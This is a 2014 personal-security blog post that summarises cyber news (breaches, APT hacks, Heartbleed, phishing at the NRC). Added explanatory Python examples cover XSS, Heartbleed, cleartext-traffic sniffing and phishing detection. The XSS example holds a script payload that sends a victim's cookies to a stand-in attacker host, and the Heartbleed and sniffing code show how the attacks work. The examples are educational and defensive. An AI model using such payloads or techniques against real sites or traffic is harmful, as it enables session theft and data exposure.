Personal Cybersecurity #45: Daily news

What you need to know for your personal cyber security life…

Number forty-five in a series of semi-regular daily posts on current and topical computer threats that may affect your online, or even offline, digital and real life. Why cyber-security on SurvivalRing? Because EVERYTHING you do in your life every day is a part of the cyber world…even your offline plans. So, be aware, and pay attention. The bad guys WILL eventually get around to YOU…personally…so be prepared for it, by staying in the informational loop.

And, just so you know, I’ve got 31 years of IT experience, and my day job is with the State of Wyoming as an Information Specialist. I believe an informed prepper is a BETTER prepper. Information is the life blood of being prepared. Learn more with every article in this continuing series. Please ask questions if you want to learn more…I’m here to help.


# # #

HEADLINES…for this issue…17 articles

  • Defense ministry finds hacking attempts against its reporters
  • U.S. venture firm Kleiner Perkins suffers security breach
  • Amazon Expands Its Cloud Services to the U.S. Military
  • Michael Daniel’s Path to the White House
  • Sekurity is hard – vulnerable to XSS
  • 5 cool new security research breakthroughs
  • Target Lowers Forecast on Sales Slump, Canadian Losses
  • Chinese hackers reportedly took classified data on MH370 a day after it went missing
  • New hacking scenario emerges: Wi-Fi signal-sniffing drones
  • Heartbleed to blame for Community Health Systems breach
  • Crooks turn war-torn Syria into cyber-battlefield
  • Identifying and mitigating healthcare IT security risks
  • New website aims to publicly shame apps with lax security
  • Foreign Minister Julie Bishop’s phone was hacked at the height of the MH17 crisis
  • Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers
  • Community Health Systems Says It Suffered Criminal Cyberattack
  • Steel City’s Hacking Cases Mean Gameover for Trade Theft

# # #

Defense ministry finds hacking attempts against its reporters

Unidentified hackers, suspected to be based in China, have been caught trying to steal data from media reporters covering South Korea’s Ministry of National Defense, ministry officials said Friday.

“We’ve confirmed that a handful of reporters covering the ministry have received an e-mail which carries the malicious code this week,” a ministry official said, explaining that once the email is opened, it automatically embeds the virus code into the computer.

“The code embedded into the computer is meant to steal information in the receiver’s computer automatically. A notebook by one of the reporters was infected with the virus,” he said, noting that it is “yet to be known if any leakage took place.”

While the investigation into the incident is under way, ministry officials said that tracing the code’s IP address (an Internet Protocol address is the online equivalent of a street address or a phone number) showed that the hacker, or hackers, had used a server in Liaoning, China.


# # #

U.S. venture firm Kleiner Perkins suffers security breach

  • Aug 21, 2014

California detectives are investigating a July computer theft at storied venture-capital firm Kleiner Perkins Caufield & Byers, a spokeswoman for the Menlo Park police said on Thursday.

The theft may put Kleiner in jeopardy of losing valuable financial data and making the firm the latest in a long list of businesses that have lost sensitive information to thieves. In this case, the information was taken by physical, not electronic, means.

Kleiner invests in Silicon Valley startups with highly competitive business plans, including payments startup Square, thermostat company Nest, and ride service Uber.

Investors in its funds include endowments and foundations that keep their investment decisions private. The performance of those funds is a closely guarded secret.


# # #

Amazon Expands Its Cloud Services to the U.S. Military

  • By Frank Konkel
  • August 21, 2014

Amazon Web Services has become the first commercial cloud provider authorized to handle the Defense Department’s most sensitive unclassified data.

Today’s announcement that AWS has achieved a provisional authority to operate under DOD’s cloud security model at impact levels 3-5 is a major win for the company, as it allows DOD customers to provision commercial cloud services for the largest chunks of their data.

In technical speak, the provisional ATO granted by the Defense Information Systems Agency means DOD customers can use AWS’ GovCloud – an isolated region entirely for U.S. government customers – through a private connection routed to DOD’s network. DOD customers can now secure AWS cloud services through a variety of contract vehicles.

In layman’s terms, AWS is the first company with the ability to take any and all of DOD’s unclassified data to the cloud.


# # #

Michael Daniel’s Path to the White House

  • By Eric Chabrow
  • Gov Info Security
  • August 21, 2014

Michael Daniel sees his lack of technical expertise in IT security as an asset in his job as White House cybersecurity coordinator.

“Being too down in the weeds at the technical level could actually be a little bit of a distraction,” Daniel, a special assistant to the president, says in an interview with Information Security Media Group.

“You can get enamored with the very detailed aspects of some of the technical solutions,” he says. “And, particularly here at the White House … the real issue is to look at the broad, strategic picture and the impact that technology will have.”

Daniel came out of obscurity in the federal bureaucracy in May 2012 – he was serving as the intelligence branch chief at the White House Office of Management and Budget – when President Obama tapped him to replace the administration’s first cybersecurity coordinator, Howard Schmidt (see Who Is Michael Daniel?).


# # #

Sekurity is hard – vulnerable to XSS

  • By William Knowles @c4i
  • Senior Editor
  • InfoSec News
  • August 22, 2014

On 21 August 2014 the security researcher E1337 reported to XSSposed (XSS exposed) that Sekurity has an XSS (Cross-Site Scripting) vulnerability; the site currently has 2 vulnerabilities in total reported by security researchers.

Cross-Site Scripting (XSS) injects specially crafted data into existing web applications. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. XSS attacks often lead to bypass of access controls, unauthorized access, and disclosure of privileged or confidential information. Cross-site scripting attacks are listed as the number three vulnerability on the OWASP Top 10 list for 2013. XSS attacks are becoming more and more sophisticated these days and are being used in tandem with spear phishing, social engineering and drive-by attacks.
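To make the definition above concrete, here is an added example (not code from the InfoSec News piece or from the affected site) of the reflected XSS pattern: a search page that echoes the query back into the HTML, first without encoding and then with it. The page layout and the two attacker inputs are constructed for illustration; the check at the end only inspects the generated text, it does not run a browser.

```python
import html

# Constructed attacker inputs, the kind a reflected-XSS probe would put in ?q=.
# (Assumptions for the example, not payloads from the report.)
BODY_PAYLOAD = '<script>new Image().src="https://evil.invalid/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_search_vulnerable(query: str) -> str:
    """Builds the results page by concatenating the user's search term straight
    into the markup. This is the bug: whatever the attacker put in the URL is
    parsed by the victim's browser as part of the page, not as text."""
    return (
        "<h1>Results for " + query + "</h1>\n"
        '<input type="text" name="q" value="' + query + '">'
    )


def render_search_safe(query: str) -> str:
    """Same page with output encoding. html.escape(quote=True) turns < > & " '
    into entities, so the term is shown literally in element content and cannot
    close the value="..." attribute to smuggle in an event handler."""
    encoded = html.escape(query, quote=True)
    return (
        "<h1>Results for " + encoded + "</h1>\n"
        '<input type="text" name="q" value="' + encoded + '">'
    )


def injected_markup(page: str) -> list:
    """Crude static check used by the demo: report a live <script> element or an
    onfocus handler attribute that the untrusted input managed to create.
    (A real test would render the page in a browser; this only inspects text.)"""
    found = []
    if "<script" in page.lower():
        found.append("script element")
    if ' onfocus="' in page.lower():
        found.append("event handler attribute")
    return found


def demo() -> dict:
    """Render both payloads through both renderers; returns what each one let in."""
    return {
        "vulnerable": injected_markup(render_search_vulnerable(BODY_PAYLOAD))
        + injected_markup(render_search_vulnerable(ATTR_PAYLOAD)),
        "safe": injected_markup(render_search_safe(BODY_PAYLOAD))
        + injected_markup(render_search_safe(ATTR_PAYLOAD)),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the second payload is that the right encoding depends on where the value lands: inside a quoted attribute a bare `"` is enough to break out, which is why `quote=True` matters. Template engines with auto-escaping do this by default, and a Content-Security-Policy that disallows inline script limits the damage when an encoding step is missed.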


# # #

5 cool new security research breakthroughs

  • By Bob Brown
  • NetworkWorld
  • Aug 19, 2014

University and vendor researchers are congregating in San Diego this week at USENIX Security ’14 to share the latest findings in security and privacy, and here are 5 that jumped out to me as being particularly interesting.

*On the Feasibility of Large-Scale Infections of iOS Devices

Georgia Tech researchers acknowledge that large-scale iOS device infections have been few and far between, but they claim weaknesses in the iTunes syncing process, device provisioning process and file storage could leave iPhones, iPads and other Apple products vulnerable to attack via botnets. The bad guys could get to the iOS devices via a compromised computer, they say, to install attacker-signed apps and swipe personal info. The researchers came to their conclusion after examining DNS queries within known botnets.

*XRay: Enhancing the Web’s Transparency with Differential Correlation

Columbia University researchers introduce XRay, a tool designed to give web users more insight into which of their personal data is being used to target them with ads. The researchers will present at USENIX a prototype of XRay, which has already been posted online as an open source system for others to explore. Initially, the system can be used to explain targeting in Gmail ads, Amazon recommendations and YouTube video suggestions. “Today we have a problem: the web is not transparent. We see XRay as an important first step in exposing how websites are using your personal data,” says Assistant Professor of Computer Science Roxana Geambasu.


# # #

Target Lowers Forecast on Sales Slump, Canadian Losses

  • By Renee Dudley
  • Aug 20, 2014

Target Corp. (TGT), still struggling to rebound from last year’s hacker attack, cut its forecast for the year as slumping sales and a money-losing push into Canada take a toll on profit.

Target now expects full-year earnings of $3.10 to $3.30 a share, excluding some items, down from a previous forecast of as much as $3.90, according to a statement today. Analysts had predicted $3.44, the average estimate compiled by Bloomberg.

The bleaker forecast follows a preliminary earnings report on Aug. 5 that fell short of expectations, signaling that the company’s comeback effort will be slow going. Target has been struggling to boost U.S. traffic, repair its botched Canadian expansion and regain shoppers’ trust after hackers stole millions of customers’ data last year. The retailer hired PepsiCo Inc. (PEP) executive Brian Cornell as its new leader last month, following the ouster of Gregg Steinhafel in May.

Target is relying heavily on sales promotions to entice shoppers, but it doesn’t seem to be working, said Brian Yarbrough, an analyst at Edward Jones & Co. in St. Louis. That means Target is squeezing margins without much benefit.


# # #

Chinese hackers reportedly took classified data on MH370 a day after it went missing

  • By Jiaxi Lu
  • The Washington Post
  • August 20, 2014

Five months after Malaysia Airlines flight 370 went missing, a report emerged on Wednesday saying that Chinese hackers have targeted Malaysian government departments involved in the search for the jet.

According to the Malaysian newspaper the Star, on March 9, Malaysian officials received malware disguised as a news report claiming the MH370 had been found — a day after the flight disappeared from radar while en route from Kuala Lumpur to Beijing with 239 people on board. The newspaper cited Amirudin Abdul Wahab, chief executive of CyberSecurity Malaysia, a government agency under the Science, Technology and Innovation Ministry.

The newspaper said that a user clicked on a PDF document attached to the e-mail and released the malware unknowingly to about 30 computers belonging to high-ranking officials at agencies involved with the MH370 investigation. CyberSecurity Malaysia received reports from the administrators saying their network was congested with e-mails going out of their servers. Targeted agencies included Malaysia’s Civil Aviation Department, the National Security Council and Malaysia Airlines, most of them owned by the government, according to the Star.

“Those e-mails contained confidential data from the officials’ computers, including the minutes of meetings and classified documents. Some of these were related to the MH370 investigation,” Wahab said, according to the Star. “This was well-crafted malware that antivirus programs couldn’t detect. It was a very sophisticated attack.”

Wahab added that CyberSecurity Malaysia was able to block the transmissions of the data but that some information had already been sent from those hacked computers to an IP address that was tracked to China. Wahab said he suspects the motivation for the hacking was the MH370 investigation.


# # #

New hacking scenario emerges: Wi-Fi signal-sniffing drones

  • By George Leopold
  • Defense Systems
  • Aug 15, 2014

The next major network security threat could come from the sky, in the form of drones equipped with video cameras and the ability to sniff out mobile devices and their unique identifiers, perhaps even establishing rogue network access points in the sky that could be used to hack sensitive government or corporate networks.

That’s the potential threat, according to security specialists and at least one network security company offering detection equipment to address the new threat from the sky posed by network-hacking drones.

The inherent openness of Wi-Fi and other wireless networks, along with the proliferation of mobile devices constantly seeking network connections, provides a tempting target for signal-sniffing drones. Experts stressed that the security perimeter of an office building will now have to include the airspace around the structure, because that airspace can be easily surveyed by drones at standoff distances capable of relaying video about, say, an agency’s wireless infrastructure.

In another scenario, security analyst Glenn Wilkinson described how he rigged a “distributed, tracking, profiling and data-interception framework” called “Snoopy” to a quadcopter drone.


# # #

Heartbleed to blame for Community Health Systems breach

  • By Steve Ragan
  • CSO
  • Aug 19, 2014

According to a blog post from TrustedSec, an information security consultancy in Ohio, the breach at Community Health Systems (CHS) is the result of attackers targeting a flaw in OpenSSL, CVE-2014-0160, better known as Heartbleed.

The incident marks the first case Heartbleed has been linked to an attack of this size and type.

On Monday, CHS disclosed a data breach in an 8-K filing with the U.S. Securities and Exchange Commission. The filing itself was brief, offering few details on the actual attack and its root cause.

The regulatory notice stated that CHS believes the network compromise itself happened in April and June of 2014. Once discovered, they hired Mandiant to perform an investigation, which speculated that the attacker was part of a group in China.
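For readers who want to see what the Heartbleed flaw named above actually does, here is an added example (not code from TrustedSec, CSO, or OpenSSL) that models the heartbeat handling in Python: a vulnerable handler that trusts the sender's payload length, beside the bounds check the OpenSSL fix added. The record layout follows RFC 6520; the "memory after the record" is a constructed byte string standing in for whatever the real process happened to have on its heap.

```python
import struct
from typing import Optional

# TLS heartbeat message layout (RFC 6520): type(1) | payload_length(2) | payload | padding(>=16)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16

# Constructed bytes standing in for whatever sat after the record in the process
# heap: session cookies, form data, key material. Not real data.
SECRET_AFTER_RECORD = b"...Cookie: session=7f3a9c...; -----BEGIN RSA PRIVATE KEY-----..."


class Peer:
    """Toy model of the receiving side: the heartbeat record sits in a buffer
    that is immediately followed by other process memory."""

    def __init__(self, record: bytes, memory_after_record: bytes):
        self.memory = record + memory_after_record
        self.record_length = len(record)

    def _parse_header(self):
        hbtype = self.memory[0]
        (payload_len,) = struct.unpack("!H", self.memory[1:3])
        return hbtype, payload_len

    def _reply(self, payload_len: int) -> bytes:
        payload = self.memory[3:3 + payload_len]   # the copy (memcpy in the C code)
        return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + payload + b"\x00" * MIN_PADDING

    def heartbeat_vulnerable(self) -> bytes:
        """Pre-patch logic: the peer-supplied payload_length is trusted, so the
        reply copies that many bytes starting at the payload, running past the
        end of what was actually received."""
        hbtype, payload_len = self._parse_header()
        if hbtype != HB_REQUEST:
            return b""
        return self._reply(payload_len)

    def heartbeat_fixed(self) -> Optional[bytes]:
        """Patched logic: the record must be long enough to hold the header, the
        claimed payload and the minimum padding, otherwise it is discarded."""
        if 1 + 2 + MIN_PADDING > self.record_length:
            return None
        hbtype, payload_len = self._parse_header()
        if 1 + 2 + payload_len + MIN_PADDING > self.record_length:
            return None
        if hbtype != HB_REQUEST:
            return None
        return self._reply(payload_len)


def heartbeat_record(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_length lets the sender lie about the size."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack("!H", length) + payload + b"\x00" * MIN_PADDING


def leaked_bytes(claimed_length: int = 0x4000) -> bytes:
    """What the vulnerable handler hands back for a one-byte payload that claims
    to be claimed_length bytes long."""
    peer = Peer(heartbeat_record(b"A", claimed_length), SECRET_AFTER_RECORD)
    return peer.heartbeat_vulnerable()[3:]


if __name__ == "__main__":
    print(leaked_bytes())
```

Python slicing stops at the end of the buffer, so the model leaks only the constructed secret; the real C code read up to 64 KB past the record on every request, which is why an attacker could simply repeat it until something useful came back.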


# # #

Crooks turn war-torn Syria into cyber-battlefield

  • By David Shamah
  • The Times of Israel
  • August 20, 2014

Syrian hackers, known best for their attacks on vital sites in Israel, the US, and Europe, are turning on their own people, taking advantage of their fears about the devastating civil war around them.

The Syrian Electronic Army, an outfit that has gained fame for its hacks of government and defense websites, is one of the biggest beneficiaries of the unrest that has characterized Syria for the past several years. SEA hackers get access to user systems, recording information about on-line accounts and stealing funds, or using victims’ computers as part of huge botnets that send out spam and become part of attacks on banks and financial sites.

A new report by security firm Kaspersky Lab shows how the SEA has used a variety of Internet “dirty tricks” to hoodwink panicked web users into clicking on links and files that have installed a variety of Trojans, viruses, password hijackers, and other malware that give cybercrooks full access to computers. Because Syrians are rattled enough by the civil war to apparently click on anything that seems “official,” issued by the government or the army, hackers don’t even have to bother making their phony wares seem real. They’re confident that users will even gladly click on something called “Ammazon Internet Security” if they believe it will make them a bit safer.


# # #

Identifying and mitigating healthcare IT security risks

  • By Patrick Ouellette
  • Health IT Security
  • August 19, 2014

Being proactive in healthcare IT security means picking out risks before incidents occur, not after the fact. But the challenge is that potential risks are spread across a variety of areas within a healthcare organization. Blair Smith, Ph.D., Dean of Informatics-Management-Technology (IMT) at American Sentinel University, spoke with Health IT Security about security considerations for healthcare organizations.

Smith was a professional IT consultant for a number of years and for the last 15 years was with the University of Phoenix, including the last five as the Dean of Information Systems, prior to joining American Sentinel. He has heavy experience in disaster recovery planning and said he always considered security a heavy risk area.

What are some major security risks within healthcare at the moment?

When I look at IT security for healthcare organizations, it’s not that much different from many other retail or manufacturing organizations in that it’s a prominent topic. The key is to understand and identify areas of risk and potential exposure, and it’s where the HIPAA rules for risk assessment become very important. BYOD, for example, has its risks and benefits but from an industry perspective, the access to data housed [on the device] would be a concern.

Similarly, cloud security opens another external pathway for data to possibly be exposed to a number of different risks such as inappropriate data access and loss. As we use more mobile devices, whether it’s a smart phone or tablet, those types of things really present a wide range of issues for security personnel. And what we’re seeing today is more hackers and outside threats bringing exposure and risks to organizations. For example, there’s the subject of single sign on (SSO) and how to have effective security controls while maintaining convenience. The idea is to move beyond prevention security to proactive response technology. How do we quickly mitigate and take care of any exposures?


# # #

New website aims to publicly shame apps with lax security

  • By Robert Lemos
  • Ars Technica
  • Aug 18, 2014

The amount of personal data traveling to and from the Internet has exploded, yet many applications and services continue to put user information at risk by not encrypting data sent over wireless networks. Software engineer Tony Webster has a classic solution—shame.

Webster decided to see if a little public humiliation could convince companies to better secure their customers’ information. On Saturday, the consultant created a website, HTTP Shaming, and began posting cases of insecure communications, calling out businesses that send their customers’ personal information to the Internet without encrypting it first.

One high-profile example includes well-liked travel-information firm TripIt. TripIt allows users to bring together information on their tickets, flight times, and itinerary and then sync it with other devices and share the information with friends and co-workers. Information shared with calendar applications, however, is not encrypted, Webster says, leaving it open to eavesdropping on public networks. Among the details that could be plucked from the air by anyone on the same wireless network: a user’s full name, phone number, e-mail address, the last four digits of a credit card number, and emergency contact information. An attacker could even change or cancel the victim’s flight, he says.

So far, TripIt and 18 other applications and services have made the shaming list, many submitted by other people fed up with the security missteps of companies, Webster says.
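The eavesdropping Webster describes is easy to reproduce for yourself on your own traffic. Below is an added example (not code from the Ars Technica article or from HTTP Shaming) of the check a passive observer on a shared Wi-Fi network can run: it sorts captured flows into TLS and cleartext HTTP by their first bytes and scans the cleartext ones for the kinds of fields the article lists. The flows, hostnames and patterns are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

TLS_HANDSHAKE = b"\x16\x03"   # TLS record: type 22 (handshake), version 3.x
HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"PATCH ", b"DELETE ", b"HEAD ")

# Patterns for the kinds of fields the article lists. Illustrative, not exhaustive.
PII_PATTERNS = {
    "email": re.compile(r"[\w.+-]+(?:@|%40)[\w-]+\.[\w.-]+", re.I),
    "phone": re.compile(r"\b(?:\+?1[-. ]?)?\(?\d{3}\)?[-. ]?\d{3}[-. ]?\d{4}\b"),
    "card_last4": re.compile(r"(?:last4|last_four)=\d{4}", re.I),
    "session_cookie": re.compile(r"^Cookie:.*\b(?:session|sid|token)=", re.I | re.M),
}

# Constructed sample flows: (server port, first bytes of the client's payload),
# the view a passive listener on a shared Wi-Fi network gets. Hosts are fictional.
SAMPLE_FLOWS = [
    (80, b"GET /calendar/feed.ics?uid=alice%40example.com HTTP/1.1\r\n"
         b"Host: sync.example-travel.invalid\r\nCookie: session=abcd1234\r\n\r\n"),
    (443, b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03"),   # TLS ClientHello: opaque
    (80, b"POST /api/profile HTTP/1.1\r\nHost: api.example-travel.invalid\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"name=Alice+Smith&phone=555-867-5309&last4=4242"),
    (80, b"GET /static/logo.png HTTP/1.1\r\nHost: cdn.example-travel.invalid\r\n\r\n"),
]


@dataclass
class Finding:
    host: str
    request_line: str
    exposed: list = field(default_factory=list)


def classify_flow(payload: bytes) -> str:
    """'tls' if the flow opens with a TLS handshake record, 'http' if it opens
    with a cleartext request line, else 'other'. The port is deliberately
    ignored: plaintext HTTP on 443 is still plaintext."""
    if payload.startswith(TLS_HANDSHAKE):
        return "tls"
    if payload.startswith(HTTP_METHODS):
        return "http"
    return "other"


def inspect_http(payload: bytes) -> Finding:
    """Split a cleartext request into head and body and run the PII patterns
    over the whole text (URL, headers and body all travel unencrypted)."""
    text = payload.decode("utf-8", errors="replace")
    head, _, _body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    host = "?"
    for line in lines[1:]:
        if line.lower().startswith("host:"):
            host = line.split(":", 1)[1].strip()
    exposed = [name for name, rx in PII_PATTERNS.items() if rx.search(text)]
    return Finding(host=host, request_line=lines[0], exposed=exposed)


def audit(flows) -> list:
    """Return one Finding per cleartext request that carried something sensitive."""
    findings = []
    for _port, payload in flows:
        if classify_flow(payload) == "http":
            finding = inspect_http(payload)
            if finding.exposed:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_FLOWS):
        print(f"{f.host}: {f.request_line} -> {', '.join(f.exposed)}")
```

The fix on the application side is not a smarter scanner but the absence of findings: every endpoint that carries account data, including calendar feeds and sync URLs that are easy to forget, should be served over HTTPS only, with HTTP redirecting rather than answering.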


# # #

Foreign Minister Julie Bishop’s phone was hacked at the height of the MH17 crisis

  • By Ellen Whinnet
  • Political Editor
  • Herald Sun, August 16, 2014

Foreign Affairs Minister Julie Bishop’s mobile phone was compromised while she was overseas leading tense negotiations to win access to the MH17 crash site in Ukraine.

Australian intelligence officials seized Ms Bishop’s phone on her return from a two-week trip to the United States, Ukraine and Holland, having secured a deal to get Australian police into the crash area.

Russian-backed rebels shot down the Malaysia Airlines flight with a surface-to-air missile on July 17, killing 298 passengers and crew, including 38 Australians.

It is thought that our intelligence agencies know which country those responsible for compromising Ms Bishop’s phone were operating from.


# # #

Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers

  • By Aliya Sternstein
  • August 18, 2014

Nuclear Regulatory Commission computers within the past three years were successfully hacked by foreigners twice and also by an unidentifiable individual, according to an internal investigation.

One incident involved emails sent to about 215 NRC employees in “a logon-credential harvesting attempt,” according to an inspector general report Nextgov obtained through an open-records request.

The phishing emails baited personnel by asking them to verify their user accounts by clicking a link and logging in. The link really took victims to “a cloud-based Google spreadsheet.”

A dozen NRC personnel took the bait and clicked the link. The IG Cyber Crime Unit was able to “track the person who set up the spreadsheet to a foreign country,” the report states, without identifying the nation.
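The lure in the NRC case combines three things a mail filter can look for: "verify your account" wording, a link whose destination is a free cloud document rather than the organisation's own login page, and a sender outside the organisation. Here is an added example (not code from Nextgov or the inspector general's report) that scores messages on those signals; the organisation domain, the list of hosted-form sites, the lure phrases and the three sample messages are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions for this example (not from the report): the organisation's own
# mail domain, free document/form hosts where anyone can stand up a fake login
# page, and the wording that typically carries a credential lure.
INTERNAL_DOMAINS = {"corp.invalid"}
HOSTED_FORM_HOSTS = {"docs.google.com", "forms.gle", "forms.office.com"}
LURE_PHRASES = ("verify your account", "verify your user account",
                "confirm your password", "your account will be suspended")
FLAG_THRESHOLD = 2          # one weak signal alone is not enough to flag
URL_LIKE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?", re.I)

# Constructed sample messages; none of these are real mail.
SAMPLE_MESSAGES = [
    {   # lure + look-alike sender + cloud spreadsheet behind an internal-looking link
        "from": "it-helpdesk@corp-support.invalid",
        "subject": "Action required: verify your user account",
        "body": 'Please verify your user account within 24 hours: '
                '<a href="https://docs.google.com/spreadsheets/d/abc123/viewform">'
                'https://portal.corp.invalid/login</a>',
    },
    {   # genuine internal notice
        "from": "it@corp.invalid",
        "subject": "Planned maintenance this Saturday",
        "body": 'Status page: <a href="https://intranet.corp.invalid/status">'
                'https://intranet.corp.invalid/status</a>',
    },
    {   # external but harmless: one weak signal, below threshold
        "from": "news@vendor.invalid",
        "subject": "August product newsletter",
        "body": 'Read the update: <a href="https://news.vendor.invalid/august">Read more</a>',
    },
]


class LinkExtractor(HTMLParser):
    """Collects (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of a URL, or of a bare 'host/path' string used as link text."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def score_message(msg: dict) -> list:
    """Return the phishing signals found in one message, in a fixed order."""
    reasons = []
    text = (msg["subject"] + " " + msg["body"]).lower()
    if any(phrase in text for phrase in LURE_PHRASES):
        reasons.append("credential lure wording")
    if msg["from"].rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS:
        reasons.append("sender outside organisation")
    parser = LinkExtractor()
    parser.feed(msg["body"])
    for href, visible in parser.links:
        target = host_of(href)
        if target in HOSTED_FORM_HOSTS:
            reasons.append(f"link points at hosted form ({target})")
        # Visible text that looks like a URL but names a different host is the
        # classic "shows portal.corp, goes to docs.google" trick.
        if URL_LIKE.fullmatch(visible) and host_of(visible) != target:
            reasons.append(f"link text shows {host_of(visible)} but goes to {target}")
    return reasons


def triage(messages) -> list:
    """Score every message; flag those with at least FLAG_THRESHOLD signals."""
    results = []
    for msg in messages:
        reasons = score_message(msg)
        results.append({"subject": msg["subject"], "reasons": reasons,
                        "flagged": len(reasons) >= FLAG_THRESHOLD})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_MESSAGES):
        print(("FLAG " if r["flagged"] else "ok   ") + r["subject"], r["reasons"])
```

A scorer like this belongs in front of people, not in place of them: the dozen NRC staff who clicked were responding to a plausible request, and the durable fix is a login page that a Google spreadsheet cannot imitate (single sign-on with a hardware or app-based second factor) plus a habit of reporting, rather than answering, "verify your account" mail.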


# # #

Community Health Systems Says It Suffered Criminal Cyberattack

  • The Wall Street Journal
  • Aug. 18, 2014

Community Health Systems Inc. (CYH) said Monday that its computer network was a target of an external criminal cyberattack in April and June that affected data related to some 4.5 million individuals.

The rural hospital operator and cybersecurity firm Mandiant believe the attacker was an “Advanced Persistent Threat” group originating from China, it said. The attacker, which used highly sophisticated malware and technology to attack the company’s systems, was able to bypass Community Health Systems’ security measures and to successfully copy and transfer certain data outside the company, it said.

The company said it is notifying affected patients and regulatory agencies as required by law. The data transferred, which was nonmedical patient-identification data related to the company’s physician-practice operations, affected about 4.5 million individuals who were referred for or received services from company-affiliated physicians during the past five years. The data includes patient names, addresses, birth dates, telephone numbers and Social Security numbers, but not patient credit-card, medical or clinical information. Community Health Systems said it would offer identity-theft protection services to those affected by the attack.

The intruder has typically sought valuable intellectual property, such as medical-device and equipment-development data, according to federal authorities and Mandiant, Community Health Systems said.


# # #

Steel City’s Hacking Cases Mean Gameover for Trade Theft

  • By Chris Strohm
  • Aug 18, 2014

The U.S. Justice Department is adding resources and agents in Pittsburgh to combat hackers, after the steel city’s law enforcement agencies, universities and companies led the way on two landmark prosecutions.

The two cases targeting people in China and Russia have helped make Pittsburgh the epicenter of the U.S. fight against foreign hackers. Now, the Federal Bureau of Investigation is sending a portion of 1,500 new agents to the city, mainly to support such cybercases, and the Justice Department is studying if Pittsburgh’s example can be replicated across the nation.

Pittsburgh’s efforts have been enabled by a mix of local technology researchers, aggressive law enforcement agents and businesses rich with trade secrets. While attorneys in other cities have gone after foreign hackers, Pittsburgh was the first to connect corporate cyber-espionage to the Chinese government and document direct consequences to U.S. companies.


# # #

Updated: August 22, 2014 — 5:44 pm

The Author

Rich Fleetwood

Rich is the founder of SurvivalRing, now in its 24th year, author of multimedia CDs and DVDs, loves the outdoors, his family, his geeky skill-set, and lives in rural southern Wyoming, just below the continental divide (long story, that...). Always ready to help others, he shares what he learns on multiple blogs, many social sites, and more. With a background in preparedness and survival skills, training with county, state, and national organizations, and skills in all areas of media and on air experience in live radio and television, Rich is always thinking about the "big picture", when it comes to helping individuals and families prepare for life's little surprises.
